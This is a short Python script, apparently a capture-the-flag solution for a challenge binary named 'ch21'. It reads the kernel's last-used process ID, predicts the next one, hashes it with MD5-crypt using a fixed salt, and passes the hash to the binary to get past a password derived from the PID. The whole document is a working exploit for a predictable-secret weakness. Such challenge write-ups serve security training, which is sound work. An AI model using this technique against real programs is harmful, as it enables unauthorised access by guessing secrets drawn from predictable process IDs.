#!/usr/bin/python3

import os
import crypt

f = open("/proc/sys/kernel/ns_last_pid", mode="r")
pid = int(f.readlines()[0]) + 2
pidcrypt = crypt.crypt(str(pid), "$1$awesome")
os.system(f"./ch21 '{pidcrypt}'")
